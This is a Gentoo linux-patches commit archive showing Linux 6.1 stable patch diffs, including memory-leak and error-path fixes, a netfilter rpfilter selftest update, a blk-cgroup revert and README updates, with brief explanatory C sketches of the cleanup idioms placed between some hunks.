+ 	default:
+ 		break;
+@@ -942,10 +950,17 @@ static int mca_pcm_new(struct snd_soc_component *component,
+ 		chan = mca_request_dma_channel(cl, i);
+ 
+ 		if (IS_ERR_OR_NULL(chan)) {
++			mca_pcm_free(component, rtd->pcm);
++
++			if (chan && PTR_ERR(chan) == -EPROBE_DEFER)
++				return PTR_ERR(chan);
++
+ 			dev_err(component->dev, "unable to obtain DMA channel (stream %d cluster %d): %pe\n",
+ 				i, cl->no, chan);
+-			mca_pcm_free(component, rtd->pcm);
+-			return -EINVAL;
++
++			if (!chan)
++				return -EINVAL;
++			return PTR_ERR(chan);
+ 		}
+ 
+ 		cl->dma_chans[i] = chan;
+diff --git a/sound/soc/codecs/Kconfig b/sound/soc/codecs/Kconfig
+index 7022e6286e6cb..3f16ad1c37585 100644
+--- a/sound/soc/codecs/Kconfig
++++ b/sound/soc/codecs/Kconfig
+@@ -2039,6 +2039,7 @@ config SND_SOC_WSA883X
+ config SND_SOC_ZL38060
+ 	tristate "Microsemi ZL38060 Connected Home Audio Processor"
+ 	depends on SPI_MASTER
++	depends on GPIOLIB
+ 	select REGMAP
+ 	help
+ 	  Support for ZL38060 Connected Home Audio Processor from Microsemi,
+diff --git a/sound/soc/codecs/adau7118.c b/sound/soc/codecs/adau7118.c
+index bbb0972498876..a663d37e57760 100644
+--- a/sound/soc/codecs/adau7118.c
++++ b/sound/soc/codecs/adau7118.c
+@@ -444,22 +444,6 @@ static const struct snd_soc_component_driver adau7118_component_driver = {
+ 	.endianness		= 1,
+ };
+ 
+-static void adau7118_regulator_disable(void *data)
+-{
+-	struct adau7118_data *st = data;
+-	int ret;
+-	/*
+-	 * If we fail to disable DVDD, don't bother in trying IOVDD. We
+-	 * actually don't want to be left in the situation where DVDD
+-	 * is enabled and IOVDD is disabled.
+-	 */
+-	ret = regulator_disable(st->dvdd);
+-	if (ret)
+-		return;
+-
+-	regulator_disable(st->iovdd);
+-}
+-
+ static int adau7118_regulator_setup(struct adau7118_data *st)
+ {
+ 	st->iovdd = devm_regulator_get(st->dev, "iovdd");
+@@ -481,8 +465,7 @@ static int adau7118_regulator_setup(struct adau7118_data *st)
+ 		regcache_cache_only(st->map, true);
+ 	}
+ 
+-	return devm_add_action_or_reset(st->dev, adau7118_regulator_disable,
+-					st);
++	return 0;
+ }
+ 
+ static int adau7118_parset_dt(const struct adau7118_data *st)
+diff --git a/sound/soc/mediatek/mt8195/mt8195-dai-etdm.c b/sound/soc/mediatek/mt8195/mt8195-dai-etdm.c
+index c2e268054773d..f2c9a1fdbe0d0 100644
+--- a/sound/soc/mediatek/mt8195/mt8195-dai-etdm.c
++++ b/sound/soc/mediatek/mt8195/mt8195-dai-etdm.c
+@@ -2567,6 +2567,9 @@ static void mt8195_dai_etdm_parse_of(struct mtk_base_afe *afe)
+ 
+ 	/* etdm in only */
+ 	for (i = 0; i < 2; i++) {
++		dai_id = ETDM_TO_DAI_ID(i);
++		etdm_data = afe_priv->dai_priv[dai_id];
++
+ 		ret = snprintf(prop, sizeof(prop),
+ 			       "mediatek,%s-chn-disabled",
+ 			       of_afe_etdms[i].name);
+diff --git a/tools/iio/iio_utils.c b/tools/iio/iio_utils.c
+index 8d35893b2fa85..6a00a6eecaef0 100644
+--- a/tools/iio/iio_utils.c
++++ b/tools/iio/iio_utils.c
+@@ -264,6 +264,7 @@ int iioutils_get_param_float(float *output, const char *param_name,
+ 			if (fscanf(sysfsfp, "%f", output) != 1)
+ 				ret = errno ? -errno : -ENODATA;
+ 
++			fclose(sysfsfp);
+ 			break;
+ 		}
+ error_free_filename:
+@@ -345,9 +346,9 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 			}
+ 
+ 			sysfsfp = fopen(filename, "r");
++			free(filename);
+ 			if (!sysfsfp) {
+ 				ret = -errno;
+-				free(filename);
+ 				goto error_close_dir;
+ 			}
+ 
+@@ -357,7 +358,6 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 				if (fclose(sysfsfp))
+ 					perror("build_channel_array(): Failed to close file");
+ 
+-				free(filename);
+ 				goto error_close_dir;
+ 			}
+ 			if (ret == 1)
+@@ -365,11 +365,9 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 
+ 			if (fclose(sysfsfp)) {
+ 				ret = -errno;
+-				free(filename);
+ 				goto error_close_dir;
+ 			}
+ 
+-			free(filename);
+ 		}
+ 
+ 	*ci_array = malloc(sizeof(**ci_array) * (*counter));
+@@ -395,9 +393,9 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 			}
+ 
+ 			sysfsfp = fopen(filename, "r");
++			free(filename);
+ 			if (!sysfsfp) {
+ 				ret = -errno;
+-				free(filename);
+ 				count--;
+ 				goto error_cleanup_array;
+ 			}
+@@ -405,20 +403,17 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 			errno = 0;
+ 			if (fscanf(sysfsfp, "%i", &current_enabled) != 1) {
+ 				ret = errno ? -errno : -ENODATA;
+-				free(filename);
+ 				count--;
+ 				goto error_cleanup_array;
+ 			}
+ 
+ 			if (fclose(sysfsfp)) {
+ 				ret = -errno;
+-				free(filename);
+ 				count--;
+ 				goto error_cleanup_array;
+ 			}
+ 
+ 			if (!current_enabled) {
+-				free(filename);
+ 				count--;
+ 				continue;
+ 			}
+@@ -429,7 +424,6 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 						strlen(ent->d_name) -
+ 						strlen("_en"));
+ 			if (!current->name) {
+-				free(filename);
+ 				ret = -ENOMEM;
+ 				count--;
+ 				goto error_cleanup_array;
+@@ -439,7 +433,6 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 			ret = iioutils_break_up_name(current->name,
+ 						     &current->generic_name);
+ 			if (ret) {
+-				free(filename);
+ 				free(current->name);
+ 				count--;
+ 				goto error_cleanup_array;
+@@ -450,17 +443,16 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 				       scan_el_dir,
+ 				       current->name);
+ 			if (ret < 0) {
+-				free(filename);
+ 				ret = -ENOMEM;
+ 				goto error_cleanup_array;
+ 			}
+ 
+ 			sysfsfp = fopen(filename, "r");
++			free(filename);
+ 			if (!sysfsfp) {
+ 				ret = -errno;
+-				fprintf(stderr, "failed to open %s\n",
+-					filename);
+-				free(filename);
++				fprintf(stderr, "failed to open %s/%s_index\n",
++					scan_el_dir, current->name);
+ 				goto error_cleanup_array;
+ 			}
+ 
+@@ -470,17 +462,14 @@ int build_channel_array(const char *device_dir, int buffer_idx,
+ 				if (fclose(sysfsfp))
+ 					perror("build_channel_array(): Failed to close file");
+ 
+-				free(filename);
+ 				goto error_cleanup_array;
+ 			}
+ 
+ 			if (fclose(sysfsfp)) {
+ 				ret = -errno;
+-				free(filename);
+ 				goto error_cleanup_array;
+ 			}
+ 
+-			free(filename);
+ 			/* Find the scale */
+ 			ret = iioutils_get_param_float(&current->scale,
+ 						       "scale",
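
The recurring change in this file is one cleanup idiom applied
throughout: free the heap-allocated path immediately after fopen(),
so none of the later error paths has to remember the free(), and
close the FILE * on every exit, including the early-break case in
iioutils_get_param_float(). A minimal standalone sketch of that
idiom, with hypothetical names:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>

static int read_int_attr(const char *dir, const char *name, int *out)
{
        char *path;
        FILE *fp;
        int ret = 0;

        if (asprintf(&path, "%s/%s", dir, name) < 0)
                return -ENOMEM;

        fp = fopen(path, "r");
        free(path);                 /* done with the string either way */
        if (!fp)
                return -errno;

        errno = 0;
        if (fscanf(fp, "%i", out) != 1)
                ret = errno ? -errno : -ENODATA;

        fclose(fp);                 /* closed on success and on failure */
        return ret;
}
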
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index 0c1b6acad141f..730b49e255e44 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -668,6 +668,7 @@ static int create_static_call_sections(struct objtool_file *file)
+ 		if (strncmp(key_name, STATIC_CALL_TRAMP_PREFIX_STR,
+ 			    STATIC_CALL_TRAMP_PREFIX_LEN)) {
+ 			WARN("static_call: trampoline name malformed: %s", key_name);
++			free(key_name);
+ 			return -1;
+ 		}
+ 		tmp = key_name + STATIC_CALL_TRAMP_PREFIX_LEN - STATIC_CALL_KEY_PREFIX_LEN;
+@@ -677,6 +678,7 @@ static int create_static_call_sections(struct objtool_file *file)
+ 		if (!key_sym) {
+ 			if (!opts.module) {
+ 				WARN("static_call: can't find static_call_key symbol: %s", tmp);
++				free(key_name);
+ 				return -1;
+ 			}
+ 
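
Both hunks plug the same leak class: key_name comes from a strdup() a
few lines earlier, so every early return taken before the normal free
must release it first. A generic standalone sketch, with names that
are illustrative rather than objtool's:

#include <stdlib.h>
#include <string.h>

static int check_prefixed_name(const char *name, const char *prefix)
{
        char *copy = strdup(name);

        if (!copy)
                return -1;

        if (strncmp(copy, prefix, strlen(prefix))) {
                free(copy);         /* error path releases it too */
                return -1;
        }

        /* ... use copy ... */
        free(copy);                 /* normal path */
        return 0;
}
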
+diff --git a/tools/testing/selftests/netfilter/rpath.sh b/tools/testing/selftests/netfilter/rpath.sh
+index f7311e66d2193..5289c8447a419 100755
+--- a/tools/testing/selftests/netfilter/rpath.sh
++++ b/tools/testing/selftests/netfilter/rpath.sh
+@@ -62,10 +62,16 @@ ip -net "$ns1" a a fec0:42::2/64 dev v0 nodad
+ ip -net "$ns2" a a fec0:42::1/64 dev d0 nodad
+ 
+ # firewall matches to test
+-[ -n "$iptables" ] && ip netns exec "$ns2" \
+-	"$iptables" -t raw -A PREROUTING -s 192.168.0.0/16 -m rpfilter
+-[ -n "$ip6tables" ] && ip netns exec "$ns2" \
+-	"$ip6tables" -t raw -A PREROUTING -s fec0::/16 -m rpfilter
++[ -n "$iptables" ] && {
++	common='-t raw -A PREROUTING -s 192.168.0.0/16'
++	ip netns exec "$ns2" "$iptables" $common -m rpfilter
++	ip netns exec "$ns2" "$iptables" $common -m rpfilter --invert
++}
++[ -n "$ip6tables" ] && {
++	common='-t raw -A PREROUTING -s fec0::/16'
++	ip netns exec "$ns2" "$ip6tables" $common -m rpfilter
++	ip netns exec "$ns2" "$ip6tables" $common -m rpfilter --invert
++}
+ [ -n "$nft" ] && ip netns exec "$ns2" $nft -f - <<EOF
+ table inet t {
+ 	chain c {
+@@ -89,6 +95,11 @@ ipt_zero_rule() { # (command)
+ 	[ -n "$1" ] || return 0
+ 	ip netns exec "$ns2" "$1" -t raw -vS | grep -q -- "-m rpfilter -c 0 0"
+ }
++ipt_zero_reverse_rule() { # (command)
++	[ -n "$1" ] || return 0
++	ip netns exec "$ns2" "$1" -t raw -vS | \
++		grep -q -- "-m rpfilter --invert -c 0 0"
++}
+ nft_zero_rule() { # (family)
+ 	[ -n "$nft" ] || return 0
+ 	ip netns exec "$ns2" "$nft" list chain inet t c | \
+@@ -101,8 +112,7 @@ netns_ping() { # (netns, args...)
+ 	ip netns exec "$netns" ping -q -c 1 -W 1 "$@" >/dev/null
+ }
+ 
+-testrun() {
+-	# clear counters first
++clear_counters() {
+ 	[ -n "$iptables" ] && ip netns exec "$ns2" "$iptables" -t raw -Z
+ 	[ -n "$ip6tables" ] && ip netns exec "$ns2" "$ip6tables" -t raw -Z
+ 	if [ -n "$nft" ]; then
+@@ -111,6 +121,10 @@ testrun() {
+ 			ip netns exec "$ns2" $nft -s list table inet t;
+ 		) | ip netns exec "$ns2" $nft -f -
+ 	fi
++}
++
++testrun() {
++	clear_counters
+ 
+ 	# test 1: martian traffic should fail rpfilter matches
+ 	netns_ping "$ns1" -I v0 192.168.42.1 && \
+@@ -120,9 +134,13 @@ testrun() {
+ 
+ 	ipt_zero_rule "$iptables" || die "iptables matched martian"
+ 	ipt_zero_rule "$ip6tables" || die "ip6tables matched martian"
++	ipt_zero_reverse_rule "$iptables" && die "iptables not matched martian"
++	ipt_zero_reverse_rule "$ip6tables" && die "ip6tables not matched martian"
+ 	nft_zero_rule ip || die "nft IPv4 matched martian"
+ 	nft_zero_rule ip6 || die "nft IPv6 matched martian"
+ 
++	clear_counters
++
+ 	# test 2: rpfilter match should pass for regular traffic
+ 	netns_ping "$ns1" 192.168.23.1 || \
+ 		die "regular ping 192.168.23.1 failed"
+@@ -131,6 +149,8 @@ testrun() {
+ 
+ 	ipt_zero_rule "$iptables" && die "iptables match not effective"
+ 	ipt_zero_rule "$ip6tables" && die "ip6tables match not effective"
++	ipt_zero_reverse_rule "$iptables" || die "iptables match over-effective"
++	ipt_zero_reverse_rule "$ip6tables" || die "ip6tables match over-effective"
+ 	nft_zero_rule ip && die "nft IPv4 match not effective"
+ 	nft_zero_rule ip6 && die "nft IPv6 match not effective"
+ 
+diff --git a/tools/testing/selftests/tc-testing/tc-tests/filters/tcindex.json b/tools/testing/selftests/tc-testing/tc-tests/filters/tcindex.json
+deleted file mode 100644
+index 44901db703764..0000000000000
+--- a/tools/testing/selftests/tc-testing/tc-tests/filters/tcindex.json
++++ /dev/null
+@@ -1,227 +0,0 @@
+-[
+-    {
+-        "id": "8293",
+-        "name": "Add tcindex filter with default action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref 1 tcindex chain 0 handle 0x0001 classid 1:1",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "7281",
+-        "name": "Add tcindex filter with hash size and pass action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex hash 32 fall_through classid 1:1 action pass",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref.*tcindex chain [0-9]+ handle 0x0001 classid 1:1.*action order [0-9]+: gact action pass",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "b294",
+-        "name": "Add tcindex filter with mask shift and reclassify action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex hash 32 mask 1 shift 2 fall_through classid 1:1 action reclassify",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref.*tcindex chain [0-9]+ handle 0x0001 classid 1:1.*action order [0-9]+: gact action reclassify",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "0532",
+-        "name": "Add tcindex filter with pass_on and continue actions",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex hash 32 mask 1 shift 2 pass_on classid 1:1 action continue",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref.*tcindex chain [0-9]+ handle 0x0001 classid 1:1.*action order [0-9]+: gact action continue",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "d473",
+-        "name": "Add tcindex filter with pipe action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex hash 32 mask 1 shift 2 fall_through classid 1:1 action pipe",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref.*tcindex chain [0-9]+ handle 0x0001 classid 1:1.*action order [0-9]+: gact action pipe",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "2940",
+-        "name": "Add tcindex filter with miltiple actions",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 7 tcindex hash 32 mask 1 shift 2 fall_through classid 1:1 action skbedit mark 7 pipe action gact drop",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 7 protocol ip tcindex",
+-        "matchPattern": "^filter parent ffff: protocol ip pref 7 tcindex.*handle 0x0001.*action.*skbedit.*mark 7 pipe.*action.*gact action drop",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "1893",
+-        "name": "List tcindex filters",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress",
+-            "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1",
+-            "$TC filter add dev $DEV1 parent ffff: handle 2 protocol ip prio 1 tcindex classid 1:1"
+-        ],
+-        "cmdUnderTest": "$TC filter show dev $DEV1 parent ffff:",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "handle 0x000[0-9]+ classid 1:1",
+-        "matchCount": "2",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "2041",
+-        "name": "Change tcindex filter with pass action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress",
+-            "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action drop"
+-        ],
+-        "cmdUnderTest": "$TC filter change dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action pass",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "handle 0x0001 classid 1:1.*action order [0-9]+: gact action pass",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "9203",
+-        "name": "Replace tcindex filter with pass action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress",
+-            "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action drop"
+-        ],
+-        "cmdUnderTest": "$TC filter replace dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action pass",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "handle 0x0001 classid 1:1.*action order [0-9]+: gact action pass",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "7957",
+-        "name": "Delete tcindex filter with drop action",
+-        "category": [
+-            "filter",
+-            "tcindex"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress",
+-            "$TC filter add dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action drop"
+-        ],
+-        "cmdUnderTest": "$TC filter del dev $DEV1 parent ffff: handle 1 protocol ip prio 1 tcindex classid 1:1 action drop",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter get dev $DEV1 parent ffff: handle 1 prio 1 protocol ip tcindex",
+-        "matchPattern": "handle 0x0001 classid 1:1.*action order [0-9]+: gact action drop",
+-        "matchCount": "0",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    }
+-]


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-11 11:19 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-03-11 11:19 UTC (permalink / raw
  To: gentoo-commits

commit:     9399b06afe40f694ceac26c67c236144f76a5274
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Mar 11 11:19:31 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Mar 11 11:19:31 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=9399b06a

Linux patch 6.1.17

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 ++
 1016_linux-6.1.17.patch | 123 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 127 insertions(+)

diff --git a/0000_README b/0000_README
index aab72b3b..e2811191 100644
--- a/0000_README
+++ b/0000_README
@@ -107,6 +107,10 @@ Patch:  1015_linux-6.1.16.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.16
 
+Patch:  1016_linux-6.1.17.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.17
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1016_linux-6.1.17.patch b/1016_linux-6.1.17.patch
new file mode 100644
index 00000000..fb9f6cec
--- /dev/null
+++ b/1016_linux-6.1.17.patch
@@ -0,0 +1,123 @@
+diff --git a/Makefile b/Makefile
+index 5ac6895229e9c..db482a420dcaf 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 16
++SUBLEVEL = 17
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c
+index f8b21bead6552..7c91d9195da8d 100644
+--- a/block/blk-cgroup.c
++++ b/block/blk-cgroup.c
+@@ -87,32 +87,14 @@ static void blkg_free_workfn(struct work_struct *work)
+ {
+ 	struct blkcg_gq *blkg = container_of(work, struct blkcg_gq,
+ 					     free_work);
+-	struct request_queue *q = blkg->q;
+ 	int i;
+ 
+-	/*
+-	 * pd_free_fn() can also be called from blkcg_deactivate_policy(),
+-	 * in order to make sure pd_free_fn() is called in order, the deletion
+-	 * of the list blkg->q_node is delayed to here from blkg_destroy(), and
+-	 * blkcg_mutex is used to synchronize blkg_free_workfn() and
+-	 * blkcg_deactivate_policy().
+-	 */
+-	if (q)
+-		mutex_lock(&q->blkcg_mutex);
+-
+ 	for (i = 0; i < BLKCG_MAX_POLS; i++)
+ 		if (blkg->pd[i])
+ 			blkcg_policy[i]->pd_free_fn(blkg->pd[i]);
+ 
+-	if (blkg->parent)
+-		blkg_put(blkg->parent);
+-
+-	if (q) {
+-		list_del_init(&blkg->q_node);
+-		mutex_unlock(&q->blkcg_mutex);
+-		blk_put_queue(q);
+-	}
+-
++	if (blkg->q)
++		blk_put_queue(blkg->q);
+ 	free_percpu(blkg->iostat_cpu);
+ 	percpu_ref_exit(&blkg->refcnt);
+ 	kfree(blkg);
+@@ -145,6 +127,8 @@ static void __blkg_release(struct rcu_head *rcu)
+ 
+ 	/* release the blkcg and parent blkg refs this blkg has been holding */
+ 	css_put(&blkg->blkcg->css);
++	if (blkg->parent)
++		blkg_put(blkg->parent);
+ 	blkg_free(blkg);
+ }
+ 
+@@ -441,14 +425,9 @@ static void blkg_destroy(struct blkcg_gq *blkg)
+ 	lockdep_assert_held(&blkg->q->queue_lock);
+ 	lockdep_assert_held(&blkcg->lock);
+ 
+-	/*
+-	 * blkg stays on the queue list until blkg_free_workfn(), see details in
+-	 * blkg_free_workfn(), hence this function can be called from
+-	 * blkcg_destroy_blkgs() first and again from blkg_destroy_all() before
+-	 * blkg_free_workfn().
+-	 */
+-	if (hlist_unhashed(&blkg->blkcg_node))
+-		return;
++	/* Something wrong if we are trying to remove same group twice */
++	WARN_ON_ONCE(list_empty(&blkg->q_node));
++	WARN_ON_ONCE(hlist_unhashed(&blkg->blkcg_node));
+ 
+ 	for (i = 0; i < BLKCG_MAX_POLS; i++) {
+ 		struct blkcg_policy *pol = blkcg_policy[i];
+@@ -460,6 +439,7 @@ static void blkg_destroy(struct blkcg_gq *blkg)
+ 	blkg->online = false;
+ 
+ 	radix_tree_delete(&blkcg->blkg_tree, blkg->q->id);
++	list_del_init(&blkg->q_node);
+ 	hlist_del_init_rcu(&blkg->blkcg_node);
+ 
+ 	/*
+@@ -1246,7 +1226,6 @@ int blkcg_init_disk(struct gendisk *disk)
+ 	int ret;
+ 
+ 	INIT_LIST_HEAD(&q->blkg_list);
+-	mutex_init(&q->blkcg_mutex);
+ 
+ 	new_blkg = blkg_alloc(&blkcg_root, disk, GFP_KERNEL);
+ 	if (!new_blkg)
+@@ -1484,7 +1463,6 @@ void blkcg_deactivate_policy(struct request_queue *q,
+ 	if (queue_is_mq(q))
+ 		blk_mq_freeze_queue(q);
+ 
+-	mutex_lock(&q->blkcg_mutex);
+ 	spin_lock_irq(&q->queue_lock);
+ 
+ 	__clear_bit(pol->plid, q->blkcg_pols);
+@@ -1503,7 +1481,6 @@ void blkcg_deactivate_policy(struct request_queue *q,
+ 	}
+ 
+ 	spin_unlock_irq(&q->queue_lock);
+-	mutex_unlock(&q->blkcg_mutex);
+ 
+ 	if (queue_is_mq(q))
+ 		blk_mq_unfreeze_queue(q);
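
The blk-cgroup hunks above go back to dropping the parent reference in
the release callback, once the child's own refcount has reached zero,
instead of in the deferred free worker. Reduced to its core, this is
the usual parent-pinning rule; a generic standalone sketch, not the
kernel code itself:

#include <stdlib.h>

struct node {
        int refcnt;
        struct node *parent;        /* child holds one ref on parent */
};

static void node_put(struct node *n)
{
        if (n && --n->refcnt == 0) {
                node_put(n->parent);    /* drop parent ref at release */
                free(n);
        }
}
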
+diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
+index 1680b6e1e5362..891f8cbcd0436 100644
+--- a/include/linux/blkdev.h
++++ b/include/linux/blkdev.h
+@@ -487,7 +487,6 @@ struct request_queue {
+ 	DECLARE_BITMAP		(blkcg_pols, BLKCG_MAX_POLS);
+ 	struct blkcg_gq		*root_blkg;
+ 	struct list_head	blkg_list;
+-	struct mutex		blkcg_mutex;
+ #endif
+ 
+ 	struct queue_limits	limits;


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-10 12:57 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-03-10 12:57 UTC (permalink / raw
  To: gentoo-commits

commit:     26d009b2414a6db78ba638c98a35d8fa1874665a
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar 10 12:57:30 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar 10 12:57:30 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=26d009b2

Remove redundant patch

Removed:
2940_gcc-plugins-drop-std-gnu-plus-plus-to-fix-GCC-13-build.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 --
 ...rop-std-gnu-plus-plus-to-fix-GCC-13-build.patch | 46 ----------------------
 2 files changed, 50 deletions(-)

diff --git a/0000_README b/0000_README
index f2ba9399..aab72b3b 100644
--- a/0000_README
+++ b/0000_README
@@ -139,10 +139,6 @@ Patch:	2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
 From:   https://lore.kernel.org/lkml/mhng-8bc81919-3023-4d72-bd44-2443606b4fd7@palmer-ri-x1c9a/T/
 Desc:   gcc-plugins: Reorganize gimple includes for GCC 13
 
-Patch:  2940_gcc-plugins-drop-std-gnu-plus-plus-to-fix-GCC-13-build.patch
-From:   https://lore.kernel.org/all/20230201230009.2252783-1-sam@gentoo.org/
-Desc:   gcc-plugins: drop -std=gnu++11 to fix GCC 13 build
-
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

